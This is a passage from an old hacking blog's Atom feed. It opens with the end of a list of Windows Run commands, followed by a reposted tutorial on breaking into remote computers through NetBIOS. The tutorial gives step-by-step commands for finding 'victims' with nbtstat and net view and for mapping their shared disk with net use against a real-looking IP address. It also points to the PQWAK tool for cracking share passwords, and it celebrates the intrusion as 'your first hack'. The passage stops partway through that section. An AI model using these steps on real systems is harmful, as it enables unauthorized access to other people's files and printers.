/&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Firewall- firewall.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Magnifier- magnify&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Management Infrastructure - wmimgmt.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Media Player - wmplayer&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Messenger - msmsgs&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Picture Import Wizard (need camera connected)- wiaacmgr&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows System Security Tool – syskey&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Update Launches - wupdmgr&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Version (to show which version of windows)- winver&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows XP Tour Wizard - tourstart&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Wordpad - write--&gt; Password Properties - password.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Performance Monitor - perfmon.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Phone and Modem Options - telephon.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Phone Dialer - dialer&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Pinball Game - pinball&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Power Configuration - powercfg.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Printers and Faxes - control printers&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Printers Folder – printers&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Private Character Editor - eudcedit&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Quicktime (If Installed)- QuickTime.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Real Player (if installed)- realplay&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Regional Settings - intl.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Registry Editor - regedit&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Registry Editor - regedit32&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Remote Access Phonebook - rasphone&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Remote Desktop - mstsc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Removable Storage - ntmsmgr.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Removable Storage Operator Requests - ntmsoprq.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Resultant Set of Policy (XP Prof) - rsop.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Scanners and Cameras - sticpl.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Scheduled Tasks - control schedtasks&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Security Center - wscui.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Services - services.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Shared Folders - fsmgmt.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Shuts Down Windows - shutdown&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Sounds and Audio - mmsys.cp&lt;/em&gt;&lt;/strong&gt;&lt;strong&gt;&lt;em&gt;l&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Spider Solitare Card Game - spider&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Malicious Software Removal Tool - mrt&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Access (if installed) - access.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Chat - winchat&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Excel (if installed) - excel&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Frontpage (if installed)- frontpg&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Movie Maker - moviemk&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Paint - mspaint&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Powerpoint (if installed)- powerpnt&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Word (if installed)- winword&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Microsoft Syncronization Tool - mobsync&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Minesweeper Game - winmine&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Mouse Properties - control mouse&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Mouse Properties - main.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;-&lt;/em&gt;&lt;/strong&gt;&lt;strong&gt;&lt;em&gt;-&gt; Nero (if installed)- nero&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Netmeeting - conf&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Network Connections - control netconnections&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Network Connections - ncpa.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Network Setup Wizard - netsetup.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Notepad - notepad&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Nview Desktop Manager (If Installed)- nvtuicpl.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Object Packager - packager&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; ODBC Data Source Administrator- odbccp32.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; On Screen Keyboard - osk&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Opens AC3 Filter (If Installed) - ac3filter.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Outlook Express - msimn&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Paint – pbrush&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Keyboard Properties - control keyboard&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Display Connection Configuration) - ipconfi/all&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Release All Connections)- ipconfig /release&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Renew All Connections)- ipconfig /renew&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration(RefreshesDHCP&amp;amp;Re-RegistersDNS)-ipconfig/registerdns&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Display DHCP Class ID)- ipconfig/showclassid&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Java Control Panel (If Installed)- jpicpl32.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Java Control Panel (If Installed)- javaws&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Local Security Settings - secpol.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Local Users and Groups - lusrmgr.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Logs You Out Of Windows - logoff.....&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Accessibility Controls - access.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Accessibility Wizard - accwiz&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Add Hardware - Wizardhdwwiz.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Add/Remove Programs - appwiz.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Administrative Tools control - admintools&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Adobe Acrobat (if installed) - acrobat&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Adobe Designer (if installed)- acrodist&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Adobe Distiller (if installed)- acrodist&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Adobe ImageReady (if installed)- imageready&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Adobe Photoshop (if installed)- photoshop&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Automatic Updates - wuaucpl.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Bluetooth Transfer Wizard – fsquirt&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Calculator - calc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Certificate Manager - certmgr.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Character Map - charmap&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Check Disk Utility - chkdsk&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Clipboard Viewer - clipbrd&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Command Prompt - cmd&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Component Services - dcomcnfg&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Computer Management - compmgmt.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Control Panel - control&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;-&lt;/em&gt;&lt;/strong&gt;&lt;strong&gt;&lt;em&gt;-&gt; Date and Time Properties - timedate.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; DDE Shares - ddeshare&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Device Manager - devmgmt.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Direct X Control Panel (If Installed)- directx.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Direct X Troubleshooter- dxdiag&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Disk Cleanup Utility- cleanmgr&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Disk Defragment- dfrg.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Disk Management- diskmgmt.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Disk Partition Manager- diskpart&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Display Properties- control desktop&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Display Properties- desk.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Display Properties (w/Appearance Tab Preselected)- control color&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Dr. Watson System Troubleshooting Utility- drwtsn32&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Driver Verifier Utility- verifie&lt;/em&gt;&lt;/strong&gt;&lt;strong&gt;&lt;em&gt;r&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Event Viewer- eventvwr.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Files and Settings Transfer Tool- migwiz&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; File Signature Verification Tool- sigverif&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Findfast- findfast.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Firefox (if installed)- firefox&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Folders Properties- control folders&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Fonts- control fonts--&gt; Fonts Folder- fonts&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Free Cell Card Game- freecell&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Game Controllers- joy.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Group Policy Editor (XP Prof)- gpedit.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Hearts Card Game- mshearts&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Help and Support- helpctr&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; HyperTerminal- hypertrm&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Iexpress Wizard- iexpress&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Indexing Service- ciadv.msc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Internet Connection Wizard- icwconn1&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Internet Explorer- iexplore&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Internet Setup Wizard- inetwiz&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Internet Properties- inetcpl.cpl &lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4705988640117276705?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4705988640117276705/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4705988640117276705' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4705988640117276705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4705988640117276705'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/possible-run-commands.html' title='Possible &quot;RUN&quot; commands'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2940993894820109132</id><published>2008-08-25T00:09:00.000-07:00</published><updated>2008-08-25T00:10:45.941-07:00</updated><title type='text'>Hacking with NetBIOS</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/06/hack-using-netbios-hacking-someones.html"&gt;Hack using NetBIOS ( hacking someones remote computer)&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS&lt;br /&gt;&lt;br /&gt;A BRIEF LESSON ON NETBIOS&lt;br /&gt;NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-&lt;br /&gt;&lt;br /&gt;Name of the computer&lt;br /&gt;&lt;br /&gt;Username&lt;br /&gt;&lt;br /&gt;Domain&lt;br /&gt;&lt;br /&gt;Computer Name&lt;br /&gt;&lt;br /&gt;and many others.&lt;br /&gt;&lt;br /&gt;Like any other service it also works on a port . It  has been assigned a port number 139.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;THE NBTSTAT COMMAND&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get&lt;br /&gt;&lt;br /&gt;c:\windows&gt;&lt;br /&gt;&lt;br /&gt;If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.&lt;br /&gt;&lt;br /&gt;Now lets play with the NBTSTAT command.&lt;br /&gt;&lt;br /&gt;If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat/?&lt;br /&gt;&lt;br /&gt;If you want to get the NetBIOS information of your computer type the following command&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 127.0.0.1&lt;br /&gt;&lt;br /&gt;This command will list the NetBIOS information. A typical  example&lt;br /&gt;&lt;br /&gt;                                   NetBIOS Remote Machine Name Table&lt;br /&gt;&lt;br /&gt;Name                            Number             Type                 Usage&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;&lt;br /&gt;workgroup                      00                     G                      Domain Name&lt;br /&gt;&lt;br /&gt;my_computer                 03                     U                      Messenger Service&lt;br /&gt;&lt;br /&gt;myusername                  03                     U                      Messenger Service&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MAC Address = 00-02-44-14-23-E6&lt;br /&gt;&lt;br /&gt;Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.&lt;br /&gt;&lt;br /&gt;This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.&lt;br /&gt;&lt;br /&gt;If you want to get the NetBIOS names of a remote computer, the command is&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a ipaddress&lt;br /&gt;&lt;br /&gt;Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command&lt;br /&gt;&lt;br /&gt;NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 203.195.136.156&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;WHAT YOU NEED TO HACK&lt;br /&gt;All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;TYPES OF ATTACKS&lt;br /&gt;&lt;br /&gt;We can launch two types of attack on the remote computer having  NetBIOS.&lt;br /&gt;&lt;br /&gt;1. Reading/Writing to a remote computer system&lt;br /&gt;&lt;br /&gt;2. Denial of Service&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Searching for a victim&lt;br /&gt;&lt;br /&gt;You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lets Hack -Part 1 Remotely reading/writing to a victiim's computer&lt;br /&gt;&lt;br /&gt;Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .&lt;br /&gt;The command that you will use to view the NetBIOS name is&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 203.195.136.156&lt;br /&gt;&lt;br /&gt;Let suppose that the output comes out to be&lt;br /&gt;&lt;br /&gt;        NetBIOS Remote Machine Name Table&lt;br /&gt;&lt;br /&gt;Name                        Type             Status&lt;br /&gt;-------------------------------------------------------------------------------------------------&lt;br /&gt;user            &lt;00&gt;     UNIQUE       Registered&lt;br /&gt;workgroup  &lt;00&gt;    GROUP        Registered&lt;br /&gt;user            &lt;03&gt;     UNIQUE       Registered&lt;br /&gt;user            &lt;20&gt;     UNIQUE       Registered&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MAC Address = 00-02-44-14-23-E6&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The number &lt;20&gt; shows that the victim has enabled the File And Printer Sharing.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;NOTE - If you do not get this number there are two possibilities&lt;br /&gt;&lt;br /&gt;1.  You do not get the number &lt;20&gt; . This shows that the victim has not enabled the File And Printer Sharing .&lt;br /&gt;&lt;br /&gt;2.  You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Now our next step would be to view the drive or folders  the victim is sharing.&lt;br /&gt;&lt;br /&gt;We will use command&lt;br /&gt;&lt;br /&gt;c:\windows&gt;net view \\203.195.136.156&lt;br /&gt;&lt;br /&gt;Let suppose we get the following output&lt;br /&gt;&lt;br /&gt;Shared resources at \\203.195.136.156&lt;br /&gt;ComputerNameGoesHere&lt;br /&gt;&lt;br /&gt;Share  name                Type           Used as           Comment&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------&lt;br /&gt;CDISK                            Disk&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The command completed successfully.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Shared resources at \\203.195.136.156&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ComputerNameGoesHere&lt;br /&gt;&lt;br /&gt;Share  name                Type           Used as           Comment&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------&lt;br /&gt;HP-6L                             Print&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;"Print " shows that the victim is sharing a printer named as HP-6L&lt;br /&gt;&lt;br /&gt;If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.&lt;br /&gt;&lt;br /&gt;Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.&lt;br /&gt;&lt;br /&gt;Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .&lt;br /&gt;&lt;br /&gt;Lets do it.&lt;br /&gt;&lt;br /&gt;We will use the NET command to do our work .&lt;br /&gt;&lt;br /&gt;Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command&lt;br /&gt;&lt;br /&gt;c:\windows&gt;net use k: \\203.195.136.156\CDISK&lt;br /&gt;&lt;br /&gt;You may replace k letter by any other letter.&lt;br /&gt;&lt;br /&gt;If the command is successful we will get the confirmation - The command was completed successfullly&lt;br /&gt;&lt;br /&gt;The command was completed successfully&lt;br /&gt;&lt;br /&gt;Now just double click on the My Computer icon on your desktop and you will be a happy hacker!&lt;br /&gt;&lt;br /&gt;We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cracking  Share passwords&lt;br /&gt;Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -&lt;br /&gt;&lt;br /&gt;Windows 95&lt;br /&gt;&lt;br /&gt;Windows 98&lt;br 